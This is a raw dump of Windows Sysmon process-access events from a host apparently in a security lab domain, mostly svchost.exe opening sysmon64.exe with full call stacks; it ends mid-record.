13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.861{59A5CD1D-8E44-6005-0B00-00000000A301}8563592C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+710ae|C:\Windows\system32\lsass.exe+3907|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+8